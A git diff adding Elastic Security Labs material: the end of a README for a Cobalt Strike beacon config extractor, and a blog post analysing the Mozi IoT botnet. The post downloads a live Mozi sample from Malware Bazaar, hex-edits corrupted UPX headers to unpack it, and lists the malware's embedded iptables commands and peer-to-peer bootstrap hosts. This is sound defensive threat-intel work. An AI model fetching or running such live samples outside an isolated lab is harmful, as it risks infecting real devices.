+ +[Download cobalt-strike-extractor.tar.gz](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltdbc4f9f2366d2f06/628829603b9b8554904a4ba2/cobalt-strike-extractor.tar.gz) + +## Overview + +This tool provides a Python module and command line tool that will search Elastic Endpoint alert data for detections of Cobalt Strike and the extracted memory data. When present, this tool will extract the implant configuration using the [cobaltstrike-config-extractor](https://github.com/strozfriedberg/cobaltstrike-config-extractor). The information is then normalized into an ECS-formatted JSON document and indexed into an Elasticsearch cluster or output to the terminal as JSON. + +> For help on creating Fleet policies to collect and analyze Cobalt Strike beacons in the Elastic Stack, check out our blog posts detailing this: +> +> - [Collecting Colbalt Strike beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) +> - [Extracting Cobalt Strike beacon configurations](https://www.elastic.co/security-labs/extracting-cobalt-strike-beacon-configurations) + +## Getting Started + +### Docker + +The recommended and easiest way to get going is to use Docker. From the directory this README is in, you can build a local container. + +``` +docker build . -t cobalt-strike-extractor +``` + +Next, make a copy of config.reference.yml and name it config.local.yml and edit for your environment. A minimal config looks like the example below. The input and output could use the same values, but you can optionally push it to a different cluster for analysis. + +``` +## Using an Elastic Cloud instance (this is a randomly generated example) +input.elasticsearch: + enabled: True + cloud.id: security-cluster:dXMtd2VzdDEuZ2NwLmNsb3VkLmVzLmlvJGU0MWU1YTc3YmRjNzY2OTY0MDg2NjIzNDA5NzFjNjFkJDdlYjRlYTJkMzJkMTgzYTRiMmJkMjlkNTNjODhjMjQ4 + cloud.auth: elastic: + +## Default output will use localhost:9092, see reference config +output.elasticsearch: + enabled: True + username: elastic + password: + +``` + +Now, run the container, passing in our local configuration. The -v flag here will add informational messages to the log output. Here, it tells us how many documents were successfully parsed and written. + +``` +docker run -ti --rm -v "$(pwd)/config.local.yml:/config.yml" \ + cobalt-strike-extractor:latest -c /config.yml -v + +``` + +_Output_: + +``` +[2022-01-10T21:33:31.493][INFO] Setting up input/output +[2022-01-10T21:33:31.493][INFO] Connecting to Elasticsearch for input +[2022-01-10T21:33:31.493][INFO] Successfully connected to Elasticsearch for input +[2022-01-10T21:33:31.834][INFO] Connecting to Elasticsearch for output +[2022-01-10T21:33:31.835][INFO] Successfully connected to Elasticsearch for output +[2022-01-10T21:33:33.030][WARNING] Could not parse source as PE file (DOS Header magic not found.) +[2022-01-10T21:33:33.078][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.093][WARNING] Could not parse source as PE file (DOS Header magic not found.) +[2022-01-10T21:33:33.096][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.) +[2022-01-10T21:33:33.097][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.097][WARNING] Could not parse source as PE file (DOS Header magic not found.) 
+[2022-01-10T21:33:33.098][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.186][WARNING] Could not parse source as PE file (DOS Header magic not found.) +[2022-01-10T21:33:33.191][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.461][WARNING] Could not parse source as PE file (DOS Header magic not found.) +[2022-01-10T21:33:33.516][WARNING] CobaltStrike Beacon config not found: +[2022-01-10T21:33:33.927][INFO] Wrote 2 docs to Elasticsearch + +``` + +The [WARNING] messages here are to be expected. These are simply source documents that didn’t contain the configuration information. + +#### Filter by time + +To limit the search by time frame, you can add the --since argument, which takes either an ISO-formatted date time string or you can use [Elastic date math](https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-range-query.html#ranges-on-dates). For example, to limit search to the last 30 days, you can do the following. + +``` +docker run -ti --rm -v "$(pwd)/config.local.yml:/config.yml" \ + cobalt-strike-extractor:latest --since "now-30d/d" -c config.local.yml + +``` + +#### Pipe output to other tools + +Lastly, you can pipe the output to other commands, such as jq to do local analysis. You can also override the configuration file values using environment variables. + +``` +docker run -i --rm -a stdin -a stdout -a stderr \ + -v "$(pwd)/config.local.yml:/config.yml" \ + -e "OUTPUT_ELASTICSEARCH_ENABLED=False" \ + -e "OUTPUT_CONSOLE_ENABLED=True" cobalt-strike-extractor:latest -c /config.yml -q | jq '.cobaltstrike.server.hostname' + +``` + +In the example above, we disabled the Elasticsearch output and enabled the Console output using environment variables. We made the output more quiet using the -q flag (hiding the warnings). Then, we used jq to just pull out the “hostname” value of the configuration. + +### Running it Locally + +As mentioned above, Docker is the recommended approach to running this project, however you can also run this locally. This project uses [Poetry](https://python-poetry.org/) to manage dependencies, testing, and metadata. If you have Poetry installed already, from this directory, you can simply run the following commands to run the tool. This will setup a virtual environment, install the dependencies, activate the virtual environment, and run the console script. + +``` +poetry lock +poetry install +poetry shell +cobalt-strike-extractor --help + +``` + +Once that works, you can do the same sort of things as mentioned in the Docker instructions above. diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md new file mode 100644 index 0000000000000..ed450681a168b --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/collecting_and_operationalizing_threat_data_from_the_mozi_botnet.md @@ -0,0 +1,450 @@ +--- +title: "Collecting and operationalizing threat data from the Mozi botnet" +slug: "collecting-and-operationalizing-threat-data-from-the-mozi-botnet" +date: "2022-06-02" +description: "The Mozi botnet is an ongoing malware campaign targeting unsecured and vulnerable networking devices. This post will showcase the analyst journey of collecting, analyzing, and operationalizing threat data from the Mozi botnet." 
+author:
+ - slug: andrew-pease
+ - slug: seth-goodwin
+ - slug: derek-ditch
+ - slug: daniel-stepanic
+image: "blog-thumb-mozi-botnet.jpg"
+category:
+ - slug: security-research
+---
+
+Detecting and preventing malicious activity such as botnet attacks is a critical area of focus for threat intel analysts, security operators, and threat hunters. Taking up the Mozi botnet as a case study, this blog post demonstrates how to use open source tools, analytical processes, and the Elastic Stack to perform analysis and enrichment of collected data irrespective of the campaign. This will allow you to take the lessons and processes outlined below to your organization and apply them to your specific use cases.
+
+The Mozi botnet has been leveraging vulnerable Internet of Things (IoT) devices to launch campaigns that can take advantage of the force multiplication provided by a botnet (Distributed Denial of Service (DDoS), email spam, brute-force, password spraying, etc.). Mozi was [first reported](https://blog.netlab.360.com/mozi-another-botnet-using-dht/) by the research team at 360Netlab in December 2019 and has continued to make up a large portion of IoT network activity across the Internet-at-large.
+
+As reported by 360Netlab, the botnet spreads via the use of weak and default remote access passwords for targeted devices as well as through multiple public exploits. The Mozi botnet communicates using a Distributed Hash Table (DHT), which records the contact information for other nodes in the botnet. This is the same serverless mechanism used by file sharing peer-to-peer (P2P) clients. Once the malware has accessed a vulnerable device, it executes the payload and subsequently joins the Mozi P2P network. The newly infected device listens for commands from controller nodes and also attempts to infect other vulnerable devices.
+
+Mozi targets multiple IoT devices and systems, mainly focusing on Small Office Home Office (SOHO) networking devices, Internet-connected audio visual systems, and theoretically any 32-bit ARM device.
+
+## Collection
+
+When performing data analysis, the more data that you have, the better. Analysis of malware campaigns is no different. With a paid subscription to VirusTotal, you can collect huge amounts of data for analysis, but we wanted an approach for independent researchers or smaller organizations that may not have this premium service. To do that, we decided to keep to our roots at Elastic and leverage open source datasets to avoid a paywall that could prevent others from using our processes.
+
+To begin, we started with a handful of [Mozi samples](https://threatfox.abuse.ch/browse.php?search=tag%3Amozi) collected from [ThreatFox](https://threatfox.abuse.ch/). ThreatFox is an open source platform from [Abuse.ch](https://abuse.ch) with the goal of sharing malware indicators with the security research community.
+
+Using cURL, we queried the ThreatFox API for the Mozi tag. This returned JSON documents with information about the malware sample, based on the tagged information.
+ +``` +curl -X POST https://threatfox-api.abuse.ch/api/v1/ -d '{ "query": "taginfo", "tag": "Mozi", "limit": 1 }' +``` + +_Code block 1 - cURL request to ThreatFox API_ + +- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the ThreatFox API +- `https://threatfox-api.abuse.ch/api/v1/` - this is the ThreatFox API endpoint +- -d - this is denoting that we’re going to be sending data +- query: taginfo - the type of query that we’re making, taginfo in our example +- tag: Mozi - the tag that we’ll be searching for, “Mozi” in our example +- limit: 1 - the number of results to return, 1 result in our example, but you can return up to 1000 results + +This returned the following information: + +``` +{ + "query_status": "ok", + "data": [ + { + "id": "115772", + "ioc": "nnn.nnn.nnn.nnn:53822", + "threat_type": "botnet_cc", + "threat_type_desc": "Indicator that identifies a botnet command&control server (C&C)", + "ioc_type": "ip:port", + "ioc_type_desc": "ip:port combination that is used for botnet Command&control (C&C)", + "malware": "elf.mozi", + "malware_printable": "Mozi", + "malware_alias": null, + "malware_malpedia": "https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/elf.mozi", + "confidence_level": 75, + "first_seen": "2021-06-15 08:22:52 UTC", + "last_seen": null, + "reference": "https:\/\/bazaar.abuse.ch\/sample\/832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b\/", + "reporter": "abuse_ch", + "tags": [ + "Mozi" + ] + } + ] +``` + +_Code block 2 - Response from ThreatFox API_ + +Now that we have the file hashes of several samples, we can download the samples using the Malware Bazaar API. Malware Bazaar is another open source platform provided by Abuse.ch. While ThreatFox is used to share contextual information about indicators, Malware Bazaar allows for the actual collection of malware samples (among other capabilities). + +Just like with ThreatFox, we’ll use cURL to interact with the Malware Bazaar API, but this time to download the actual malware samples. Of note, the Malware Bazaar API can be used to search for samples using a tag (“Mozi”, in our example), similar to how we used the ThreatFox API. The difference is that the ThreatFox API returns network indicators that we’ll use later on for data enrichment. + +``` +curl -X POST https://mb-api.abuse.ch/api/v1 -d 'query=get_file&sha256_hash=832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b' -o 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw +``` + +_Code block 3 - cURL request to Malware Bazaar API_ + +- -X POST - change the cURL HTTP method from GET (default) to POST as we’re going to be sending data to the Malware Bazaar API +- `https://mb-api.abuse.ch/api/v1` - this is the Malware Bazaar API endpoint +- -d - this is denoting that we’re going to be sending data +- query: get_file - the type of query that we’re making, get_file in our example +- sha256_hash - the SHA256 hash we’re going to be collecting, “832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b” in our example +- -o - the file name we’re going to save the binary as + +This will save a file locally named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw. We want to make a raw file that we’ll not modify so that we always have an original sample for archival purposes. This downloads the file as a Zip archive. The passphrase to extract the archive is infected. 
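+With 7-Zip installed, for example, the archive can be extracted non-interactively (a sketch; any archive tool that accepts a passphrase will work just as well):
+
+```
+$ 7z x -pinfected 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.raw
+```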
This will create a local file named 832fb4090879c1bebe75bea939a9c5724dbf87898febd425f94f7e03ee687d3b.elf. Going forward, we’ll use a shorter name for this file, truncated-87d3b.elf, for readability. + +### Unpacking + +Now that we have a few samples to work with we can look at ripping out strings for further analysis. Once in our analysis VM we took a stab at running [Sysinternals Strings](https://docs.microsoft.com/en-us/sysinternals/downloads/strings) over our sample: + +``` +$ strings truncated-87d3b.elf +ELF +*UPX! +ELF +$Bw +(GT +... +``` + +_Code block 3 - Strings output from the packed Mozi sample_ + +Right away we see that we have a [UPX](https://upx.github.io/) packed ELF binary from the “ELF” and “UPX!” text. UPX is a compression tool for executable files, commonly known as “packing”. So the next logical step is to decompress the ELF file with the UPX program. To do that, we’ll run upx with the -d switch. + +``` +$ upx -d truncated-87d3b.elf + Ultimate Packer for eXecutables + Copyright (C) 1996 - 2020 +UPX 3.96w Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 + File size Ratio Format Name + -------------------- ------ ----------- ----------- +upx.exe : upx: truncated-87d3b.elf : CantUnpackException: p_info corrupted +``` + +_Code block 4 - UPX output from corrupted Mozi sample_ + +Another road-block: the p_info section of the file appears to be corrupted. p_info is the sum of two sections from a file, p_blocksize and p_filesize . After a quick search for the error message, we landed on a [CUJOAI Anti-Unpacking blog](https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/) explaining the header corruptions commonly used in IoT malware to disrupt automated analysis tools. + +Using this information, we cracked open our binary in [xxd](https://linux.die.net/man/1/xxd), a HEX dumper, to see which corruption we were dealing with. As described in the CUJOAI blog, the p_info blocks represent the sum of the p_filesize blocks and the p_blocksize blocks. This section begins with the 8 bytes after the UPX! text, and has been overwritten with zeros (the 8 bytes starting at 0x84 ). + +``` +$ xxd truncated-87d3b.elf +00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........ +00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4... +00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(. +00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................ +00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................ +00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z...... +00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................ +00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!.... +00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................ +00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra +000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4.. +000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... ....... +... +``` + +_Code block 5 - HEX view of the corrupted Mozi sample_ + +The CUJOAI blog states that if you manually update the values of the p_filesize blocks and the p_blocksize blocks with the value of the p_info, this will fix the corruption issue. Below we can see the p_info section in HEX, and we can use that to manually update the p_filesize and p_blocksize sections, which will allow us to unpack the binary (the 4 bytes starting at 0x1e110). + +``` +$ xxd truncated-87d3b.elf +... +0001e0c0: 1914 a614 c998 885d 39ec 4727 1eac 2805 .......]9.G'..(. 
+0001e0d0: e603 19f6 04d2 0127 52c9 9b60 00be 273e .......'R..`..'> +0001e0e0: c00f 5831 6000 0000 0000 90ff 0000 0000 ..X1`........... +0001e0f0: 5550 5821 0000 0000 5550 5821 0d17 0308 UPX!....UPX!.... +0001e100: 5199 6237 591c 321c d001 0000 b800 0000 Q.b7Y.2......... +0001e110: 7c2a 0400 5000 0011 8000 0000 |*..P....... +``` + +_Code block 6 - p_info HEX data from the corrupted Mozi sample_ + +First, let’s open the file with Vim. As we can see, it is just a UPX file as denoted by the UPX!. + +``` +$ vim truncated-87d3b.elf +^?ELF^A^A^Aa^@^@^@^@^@^@^@^@^B^@(^@^A^@^@^@^PW^B^@4^@^@^@^@^@^@^@^B^B^@^@4^@ ^@^B^@(^@^@^@^@^@^A^@^@^@^@^@^@^@^@<80>^@^@^@<80>^@^@^Mà^A^@^Mà^A^@^E^@^@^@^@<80>^@^@^A^@^@^@°z^@^@°ú^F^@°ú^F^@^@^@^@^@^@^@^@^@^F^@^@^@^@<80>^@^@^Pñ<8f>RUPX!^\ +``` + +_Code block 7 - Corrupted Mozi sample in Vim_ + +Using the xxd plugin for Vim, we can convert this to HEX so that we can make our modifications. This is achieved by typing :%!xxd, which will show us the HEX output for the file. + +``` +00000000: 7f45 4c46 0101 0161 0000 0000 0000 0000 .ELF...a........ +00000010: 0200 2800 0100 0000 1057 0200 3400 0000 ..(......W..4... +00000020: 0000 0000 0202 0000 3400 2000 0200 2800 ........4. ...(. +00000030: 0000 0000 0100 0000 0000 0000 0080 0000 ................ +00000040: 0080 0000 0de0 0100 0de0 0100 0500 0000 ................ +00000050: 0080 0000 0100 0000 b07a 0000 b0fa 0600 .........z...... +00000060: b0fa 0600 0000 0000 0000 0000 0600 0000 ................ +00000070: 0080 0000 10f1 8f52 5550 5821 1c09 0d17 .......RUPX!.... +00000080: 0000 0000 0000 0000 0000 0000 9400 0000 ................ +00000090: 5e00 0000 0300 0000 f97f 454c 4601 7261 ^.........ELF.ra +000000a0: 000f 0200 28dd 0001 0790 b681 0334 ee07 ....(........4.. +000000b0: ec28 04db 1302 0bfb 2000 031b be0a 0009 .(...... ....... +``` + +_Code block 8 - Corrupted Mozi sample in Vim with XXD plugin_ + +Next, we can just update bytes 0x84 - 0x8b(that we identified as having the zero’d out p_filesize and p_blocksize) with the HEX value for p_info (7c2a 0400). + +``` +00000080: 0000 0000 7c2a 0400 7c2a 0400 9400 0000 ....|*..|*...... +``` + +_Code block 9 - Updated p_filesize and p_blocksize HEX values_ + +Let’s reset the file back using :%!xxd -r, save the file and exit Vim (:wq). + +Finally, let’s try to unpack the file now that we’ve manually adjusted the HEX values. + +``` +$ upx -d truncated-87d3b.elf + Ultimate Packer for eXecutables + Copyright (C) 1996 - 2020 +UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020 + File size Ratio Format Name + -------------------- ------ ----------- ----------- + 273020 <- 123165 45.11% linux/arm truncated-87d3b.elf +Unpacked 1 file. +``` + +_Code block 10 - Successfully unpacked Mozi sample_ + +We now have successfully unpacked the file. Let’s check to see what kind of file this is now by using the file command. + +``` +$ file truncated-87d3b.elf +truncated-87d3b.elf: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped +``` + +_Code block 11 - File type identification of the Mozi sample_ + +Now, we can again use the strings command to see if there is any useful information that we can use (truncated for readability). + +``` +$ strings truncated-87d3b.elf +... 
+iptables -I OUTPUT -p udp --source-port %d -j ACCEPT +iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT +iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT +iptables -I INPUT -p udp --dport %d -j ACCEPT +iptables -I OUTPUT -p udp --sport %d -j ACCEPT +iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT +iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT +0.0.0.0 +[idp] +This node doesn't accept announces +v2s +dht.transmissionbt.com:6881 +router.bittorrent.com:6881 +router.utorrent.com:6881 +bttracker.debian.org:6881 +nnn.nnn.nnn.nnn:6881 +abc.abc.abc.abc:6881 +xxx.xxx.xxx.xxx:6881 +yyy.yyy.yyy.yyy:6881 +NfZ +Oo~Mn +g5= +N]% +Range: bytes= +User-Agent: +... +``` + +_Code block 12 - Strings output from the unpacked Mozi sample_ + +Running Strings, we can see, among other things, network indicators and changes to the local firewall, iptables. There is a lot of great information in this file that we can now review which can be used to search for infected devices. + +Next, let’s enrich the ThreatFox data, store it in Elasticsearch, and visualize it with Kibana. + +## Storing threat data in the Elastic Stack + +Looking at what we’ve collected so far, we have rich threat data provided by ThreatFox that includes both network and file information. Additionally, we have actual malware samples collected from Malware Bazaar. Finally, we have performed static file analysis on the malware to identify additional indicators that could be of use. + +For the next steps, we’re going to parse the data from ThreatFox and store that in the Elastic Stack so that we can leverage Kibana to visualize data to identify clusters of activity. + +## Create the Ingest Node Pipeline + +We're going to create an Ingest Node Pipeline to transform the data from ThreatFox into enriched Elasticsearch data. When making a pipeline, it's useful to make a table to lay out what we're going to do. + +| | | +| ---------------------------- | --------------------------------------------------------------- | +| ThreatFox field | ECS-style field | +| id | event.id | +| ioc | threat.indicator.ip and threat.indicator.port | +| threat_type | threat.software.type | +| threat_type_desc | threat.indicator.description | +| ioc_type | threat.indicator.type. Set threat.indicator.type to "ipv4-addr" | +| malware | threat.software.name | +| malware_printable | threat.threatfox.malware_printable | +| malware_alias | threat.software.alias (if non-null) | +| malware_malpedia | threat.software.reference | +| confidence_level | threat.indicator.confidence | +| first_seen | threat.indicator.first_seen | +| last_seen | threat.indicator.last_seen | +| reference | event.reference | +| reporter | event.provider | +| tags | tags | +| `` | threat.indicator.geo. Enriched by our geoip processor. | +| `` | file.hash.sha256 and related.hash | +| `` | related.ip | + +_Table 1 - Elasticsearch Ingest Node Pipeline for ThreatFox data_ + +To create the pipeline, go to **Kibana Stack Management** -> **Ingest Node Pipelines** , then click **Create pipeline**. + +![Figure 1 - Creating Ingest Node Pipeline for ThreatFox data](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-1.jpg) + +Next, we’ll give our pipeline a name, optionally a version, and a description. + +From this view you can manually add processors and configure them to your liking. 
To give you a head start, we've provided the [ThreatFox pipeline definition here](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json) that you can paste in.
+
+Click **Import processors** and paste the contents of this pipeline definition: [pipeline.json](https://github.com/elastic/examples/blob/master/blog/mozin-about/ingest-node-pipeline.json).
+
+When you click **Load and overwrite**, you'll have each processor listed there as we've configured it. From here you can tweak it to your needs, or just scroll down and click **Create pipeline**.
+
+![Figure 2 - Ingest Node Processors for ThreatFox data](/assets/images/collecting-and-operationalizing-threat-data-from-the-mozi-botnet/blog-mozi-botnet-2.jpg)
+
+Alternatively, if you’d like a turnkey approach, the [collection.sh](https://github.com/elastic/examples/blob/master/blog/mozin-about/collection.sh) script will collect the ThreatFox Mozi data, create the Elasticsearch ingest pipeline, the indicators index, and the index pattern, and send the data from ThreatFox directly into Elasticsearch.
+
+```
+$ git clone https://github.com/elastic/examples
+$ cd examples/blog/mozin-about
+$ sh collection.sh
+```
+
+_Code block 13 - Using the Mozi sample collection script_
+
+Using the provided collection script, we can see the ThreatFox data is converted into the Elastic Common Schema (ECS) and sent to Elasticsearch for analysis.
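+
+One quick way to confirm that the enriched documents landed is to query them back out of Elasticsearch (a sketch: it assumes the collection script created an index named indicators and uses placeholder credentials, so check collection.sh for the exact values in your environment):
+
+```
+$ curl -s -u elastic:<password> "http://localhost:9200/indicators/_search?q=threat.software.name:elf.mozi&size=1&pretty"
+```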